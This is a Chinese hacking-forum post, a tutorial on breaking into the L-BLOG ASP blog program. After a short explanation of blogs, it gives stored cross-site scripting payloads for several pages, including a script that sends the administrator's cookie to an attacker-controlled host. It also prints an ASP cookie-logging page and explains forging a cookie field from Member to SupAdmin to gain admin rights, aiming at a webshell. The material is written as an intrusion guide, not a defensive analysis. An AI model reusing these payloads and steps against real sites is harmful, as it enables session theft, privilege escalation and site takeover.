|
 | 作者: jianphu [jianphu]
 论坛用户 |
登录 |
| 首先说说的是什么是blog(博客)?因为很多人都不知道blog是什么?就算看完了这篇文章都不明白,所以浪费一些篇幅希望编辑不要删除!谢谢 释义: 网络出版(Web Publishing)、发表和张贴(Post――这个字当名词用时就是指张贴的文章)文章是个急速成长的网络活动,现在甚至出现了一个用来指称这种网络出版和发表文章的专有名词――Weblog,或Blog。一个Blog就是一个网页,它通常是由简短且经常更新的Post所构成;这些张贴的文章都按照年份和日期排列。Blog的内容和目的有很大的不同,从对其他网站的超级链接和评论,有关公司、个人、构想的新闻到日记、照片、诗歌、散文,甚至科幻小说的发表或张贴都有。许多Blogs是个人心中所想之事情的发表,其它Blogs则是一群人基于某个特定主题或共同利益领域的集体创作。Blog好象对网络传达的实时讯息。撰写这些Weblog或Blog的人就叫做Blogger或Blog writer。在网络上发表Blog的构想使于1998年,但到了2000年才真正开始流行。起初,Bloggers将其每天浏览网站的心得和意见记录下来,并予以公开,来给其它人参考和遵循。但随着Blogging快速扩张,它的目的与最初已相去甚远。目前网络上数以千计的 Bloggers发表和张贴Blog的目的有很大的差异。不过,由于沟通方式比电子邮件、讨论群组更简单和容易,Blog已成为家庭、公司、部门和团队之间越来越盛行的沟通工具,因为它也逐渐被应用在企业内部网络(Intranet)。 现在在网络上使用的blog程序大致分为多用户和单用户两个版本,ASP的Blog程序以及版本都比较多,自然而然的就会存在着各种各样的漏洞啊!现在主流的ASP Blog程序有以下几种: 1.L-BLOG (Loveyuki编写的ASP+ACCESS架构),这个程序的修改以及美化版本N多 2.O-BLOG(叶开编写的ASP+ACCESS/SQL架构多用户) 3.Misslong(多用户版本) 4.theanswer‘s blog(外国开源网站项目程序,代码谨慎简洁) 5.SIC’s blog(L-BLOG的修改版本,安全性能都比原作强) 6.Dlong(猪飞飞编写的程序属于比较早的blog程序,停止开发了) 我就拿L-BLOG程序来进行分析!看看我们的L-BLOG有多少问题? 一.L-BLOG程序漏洞.(跨站式脚本漏洞) 使用最广的程序就会有更多的漏洞存在,我们L-BLOG程序也是一样啊!!首先看看的就是基本的漏洞跨站式脚本漏洞,在Member.asp/favorite.asp/bloglinks.asp页面里面发现,作者并没有为了防止跨站脚本的漏洞,所以完全没有过滤到任何的敏感字符,借此我们就可以进行COOKIE的盗取,以及对于BLOG的破坏了! 我们就拿Member.asp页面的“个人主页”栏目设置作为例子,我们发现只要输入特定恶意代码,这样子就可以拿到管理员的COOKIE或者进行破坏!例如:<script>alert("TEST.BY.H4K_B4N");</script>在个人主页栏目的时候 [IMGA]http://www.juntuan.net/d/file/hkjc/rqsl/2005-04-16/c61fe47681456e8c068fd4f687f17b8d.jpg[/IMGA] 当管理员或者其他用户查看我们设定的帐号资料的时候,代码的就会启动,这样子就完成了跨展脚本的攻击了! [IMGA]http://www.juntuan.net/d/file/hkjc/rqsl/2005-04-16/c4d74513ea91ec84c9212c75c0bc622c.jpg[/IMGA] 在三个页面当中危害性最大的就是bloglinks.asp添加连接页面,只要在申请连接的地址输入恶意代码,就可以直接拿到管理员的COOKIE了,因为每个连接都需要经过管理员的审核才可以,这样子每当管理员登陆admincp.asp管理后台的相关页面就会启动代码从而得到我们需要的COOKIE了! 代码如下: <script> document.location='http://yoursite.com/cookie.asp?'%2Bdocument.cookie </script> COOKIE页面代码: <% Testfile=server.mappath("info.txt") Msg=request.servervariables("QUERY_STRING") Set fs=server.createobject("scripting.filesystemobject") Set thisfile=fs.opentextfile(testfile,8,true,0) Thidfile.writeline(""&msg&"") Thisfile.close Set fs=nothing %> 利用以上的代码,我们就可以很轻松的拿到管理员的COOKIE资料,进行进一步的入侵了。 (COOKIE欺骗漏洞) 之前我们说了关于跨站式脚本漏洞的实现,如果我们拿到了COOKIE,可以去跑密码,因为COOKIE保留了管理员的密码,这样子就可以拿到前台以及后台的管理员权限了(如果你的主机或者是肉鸡超级强的话,我建议你去跑啊!要是我才不干啊!)如果密码没有跑出来哪怎么办啊?放弃啊?我们可以试试利用COOKIE欺骗来得到前台管理员权限和webshell (只针对1.08(SE)以下没有打补丁的版本/修改版本) 首先就是利用老兵的Cookies&Inject Browser去访问网站,这样子我们就可以拿到L-BLOG程序的用户Cookie了,从而我们可以借用修改得到前台的管理员权限。 [IMGA]http://www.juntuan.net/d/file/hkjc/rqsl/2005-04-16/a93479b8f900b33927f964bb13d2402b.jpg[/IMGA] 利用快速注册,我们很快的就拿到了用户COOKIE,然后我们需要把L-BLOG的COOKIE资料进行修改,从而进行COOKIE欺骗。 COOKIE如下:(以下的COOKIE进过删减) guoming(cookie保存的名称)=memLastpost=2005%2D1%2D7+21%3A24%3A21 &memPassword=E05CDD2E1AB4BF0AAE6A8E02217C234C(我们帐号的密码) &memStatus=Member(我们的等级或者权限)&memName=h4k%5Fb4n(用户名称) 而我们需要修改的参数就是关于我们权限的部分,首先我们把 memStatus=Member修改为SupAdmin。但是为什么要修改为这个了?经过查看L-BLOG的数据库我们可以看到管理员的memStatus是SupAdmin。[IMGA]http://www.juntuan.net/d/file/hkjc/rqsl/2005-04-16/5921386feb580e8c304eabe2a8747851.jpg[/IMGA] 所以为了得到管理员的权限我们必需把Member修改为SupAdmin,这样子我们就可以得到前台管理权限。保存好我们修改的COOKIE后,刷新网页我们就可以看到结果。 |
| 地主 发表时间: 05-05-03 16:46 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: L-BLOG经典入侵教程